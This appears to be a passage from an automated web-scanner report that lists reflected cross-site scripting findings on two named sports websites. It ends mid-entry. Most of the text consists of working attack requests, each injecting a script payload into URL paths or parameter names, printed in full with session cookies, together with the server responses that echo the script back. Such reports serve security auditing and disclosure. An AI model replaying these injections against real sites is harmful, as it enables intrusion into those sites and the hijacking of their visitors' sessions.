HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:26 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:26 GMT Content-Length: 822 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.htmldf301<script>alert(1)</script>d8187e7500b"</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6ddc5<script>alert(1)</script>7923811833e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common6ddc5<script>alert(1)</script>7923811833e/global_flash/player/player.php HTTP/1.1 Host: www.csnwashington.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:22 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:22 GMT Content-Length: 797 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common6ddc5<script>alert(1)</script>7923811833e/global_flash/player/player.php"</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ac5d0<script>alert(1)</script>c5ac45b6811 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/global_flashac5d0<script>alert(1)</script>c5ac45b6811/player/player.php HTTP/1.1 Host: www.csnwashington.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:22 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:22 GMT Content-Length: 797 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/global_flashac5d0<script>alert(1)</script>c5ac45b6811/player/player.php"</strong> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7d2d0<script>alert(1)</script>874f6e6b8a4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/global_flash/player7d2d0<script>alert(1)</script>874f6e6b8a4/player.php HTTP/1.1 Host: www.csnwashington.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:22 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:22 GMT Content-Length: 797 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/global_flash/player7d2d0<script>alert(1)</script>874f6e6b8a4/player.php"</strong> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 380be<script>alert(1)</script>fb96cb39309 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/global_flash/player/player.php380be<script>alert(1)</script>fb96cb39309 HTTP/1.1 Host: www.csnwashington.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:22 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:22 GMT Content-Length: 797 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/global_flash/player/player.php380be<script>alert(1)</script>fb96cb39309"</strong> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1a55b<script>alert(1)</script>ecfc219d1ac was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/js/1a55b<script>alert(1)</script>ecfc219d1ac HTTP/1.1 Host: www.csnwashington.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:16 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:16 GMT Content-Length: 770 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/js/1a55b<script>alert(1)</script>ecfc219d1ac"</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2f92d<script>alert(1)</script>5676dba64a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2f92d<script>alert(1)</script>5676dba64a0 HTTP/1.1 Host: www.csnwashington.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Server: Apache Vary: Accept-Encoding Content-Type: text/html Expires: Sun, 19 Dec 2010 18:37:49 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:37:49 GMT Connection: close Content-Length: 760
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/2f92d<script>alert(1)</script>5676dba64a0"</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a8777<script>alert(1)</script>64d8dabc12e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pagesa8777<script>alert(1)</script>64d8dabc12e/photos HTTP/1.1 Host: www.csnwashington.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:25 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:25 GMT Content-Length: 772 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/pagesa8777<script>alert(1)</script>64d8dabc12e/photos"</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bc646<script>alert(1)</script>24f8353ea18 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /pages/photosbc646<script>alert(1)</script>24f8353ea18 HTTP/1.1 Host: www.csnwashington.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;
Response (redirected)
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:26 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:26 GMT Content-Length: 791 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/404.html?p=/pages/photosbc646<script>alert(1)</script>24f8353ea18"</strong> ...[SNIP]...
2.414. http://www.csnwashington.com/pages/photos [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.csnwashington.com
Path:
/pages/photos
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcdf5"><script>alert(1)</script>2a5d912f71e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pages/photos?bcdf5"><script>alert(1)</script>2a5d912f71e=1 HTTP/1.1 Host: www.csnwashington.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 126701 Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:24 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:24 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <!--
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cabae<script>alert(1)</script>4d73057409f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pagescabae<script>alert(1)</script>4d73057409f/video HTTP/1.1 Host: www.csnwashington.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:22 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:22 GMT Content-Length: 771 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/pagescabae<script>alert(1)</script>4d73057409f/video"</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 49a37<script>alert(1)</script>67eec45d21f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /pages/video49a37<script>alert(1)</script>67eec45d21f HTTP/1.1 Host: www.csnwashington.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;
Response (redirected)
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:23 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:23 GMT Content-Length: 790 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/404.html?p=/pages/video49a37<script>alert(1)</script>67eec45d21f"</strong> ...[SNIP]...
2.417. http://www.csnwashington.com/pages/video [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.csnwashington.com
Path:
/pages/video
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d64b3"><script>alert(1)</script>a0a8bb6a52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pages/video?d64b3"><script>alert(1)</script>a0a8bb6a52=1 HTTP/1.1 Host: www.csnwashington.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 65103 Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:22 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:22 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <!-- web4.platformic.com --> <meta http-equiv="Content-Type" content="t ...[SNIP]... <input type=hidden name="d64b3"><script>alert(1)</script>a0a8bb6a52" id = "d64b3"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7e659<script>alert(1)</script>82e8ba31362 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pages7e659<script>alert(1)</script>82e8ba31362/videoembed HTTP/1.1 Host: www.csnwashington.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:31 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:31 GMT Content-Length: 776 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/pages7e659<script>alert(1)</script>82e8ba31362/videoembed"</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 16840<script>alert(1)</script>ac0aae4fb20 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /pages/videoembed16840<script>alert(1)</script>ac0aae4fb20 HTTP/1.1 Host: www.csnwashington.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;
Response (redirected)
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:32 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:32 GMT Content-Length: 795 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/404.html?p=/pages/videoembed16840<script>alert(1)</script>ac0aae4fb20"</strong> ...[SNIP]...
2.420. http://www.csnwashington.com/pages/videoembed [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.csnwashington.com
Path:
/pages/videoembed
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c190b"><script>alert(1)</script>920d774f729 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pages/videoembed?c190b"><script>alert(1)</script>920d774f729=1 HTTP/1.1 Host: www.csnwashington.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 45747 Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:31 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:31 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <!-- web4.platformic.com --> <meta http-equiv="Content-Type" content="t ...[SNIP]... <input type=hidden name="c190b"><script>alert(1)</script>920d774f729" id = "c190b"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7b5c2<script>alert(1)</script>7dc22b3acfd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common7b5c2<script>alert(1)</script>7dc22b3acfd/ad_count.php HTTP/1.1 Host: www.csssports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=80897029.1292783235.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=6b05ec11a461d9a8387664878226f26a; __utma=80897029.607252618.1292783235.1292783235.1292783235.1; __utmc=80897029; __utmb=80897029;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:21 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:21 GMT Content-Length: 771 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common7b5c2<script>alert(1)</script>7dc22b3acfd/ad_count.php"</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3278a<script>alert(1)</script>2d86d8be90e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/ad_count.php3278a<script>alert(1)</script>2d86d8be90e HTTP/1.1 Host: www.csssports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=80897029.1292783235.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=6b05ec11a461d9a8387664878226f26a; __utma=80897029.607252618.1292783235.1292783235.1292783235.1; __utmc=80897029; __utmb=80897029;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:22 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:22 GMT Content-Length: 771 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/ad_count.php3278a<script>alert(1)</script>2d86d8be90e"</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 87002<script>alert(1)</script>06dd5b174b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common87002<script>alert(1)</script>06dd5b174b2/dynrss/dynrss_3242_landing_.rss HTTP/1.1 Host: www.csssports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=80897029.1292783235.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=6b05ec11a461d9a8387664878226f26a; __utma=80897029.607252618.1292783235.1292783235.1292783235.1; __utmc=80897029; __utmb=80897029;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:29 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:29 GMT Content-Length: 790 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common87002<script>alert(1)</script>06dd5b174b2/dynrss/dynrss_3242_landing_.rss"</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9f644<script>alert(1)</script>37bbe352fe8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/dynrss9f644<script>alert(1)</script>37bbe352fe8/dynrss_3242_landing_.rss HTTP/1.1 Host: www.csssports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=80897029.1292783235.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=6b05ec11a461d9a8387664878226f26a; __utma=80897029.607252618.1292783235.1292783235.1292783235.1; __utmc=80897029; __utmb=80897029;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:29 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:29 GMT Content-Length: 790 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/dynrss9f644<script>alert(1)</script>37bbe352fe8/dynrss_3242_landing_.rss"</strong> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b6d45<script>alert(1)</script>d9a63c72efe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/dynrss/dynrss_3242_landing_.rssb6d45<script>alert(1)</script>d9a63c72efe HTTP/1.1 Host: www.csssports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=80897029.1292783235.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=6b05ec11a461d9a8387664878226f26a; __utma=80897029.607252618.1292783235.1292783235.1292783235.1; __utmc=80897029; __utmb=80897029;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:30 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:30 GMT Content-Length: 790 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/dynrss/dynrss_3242_landing_.rssb6d45<script>alert(1)</script>d9a63c72efe"</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 86a62<script>alert(1)</script>bfb4510976b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common86a62<script>alert(1)</script>bfb4510976b/global_flash/player/player.php HTTP/1.1 Host: www.csssports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=80897029.1292783235.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=6b05ec11a461d9a8387664878226f26a; __utma=80897029.607252618.1292783235.1292783235.1292783235.1; __utmc=80897029; __utmb=80897029;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:24 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:24 GMT Content-Length: 789 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common86a62<script>alert(1)</script>bfb4510976b/global_flash/player/player.php"</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 26ee5<script>alert(1)</script>1059f091ee8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/global_flash26ee5<script>alert(1)</script>1059f091ee8/player/player.php HTTP/1.1 Host: www.csssports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=80897029.1292783235.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=6b05ec11a461d9a8387664878226f26a; __utma=80897029.607252618.1292783235.1292783235.1292783235.1; __utmc=80897029; __utmb=80897029;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:24 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:24 GMT Content-Length: 789 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/global_flash26ee5<script>alert(1)</script>1059f091ee8/player/player.php"</strong> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9f00a<script>alert(1)</script>23a7a268b9f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
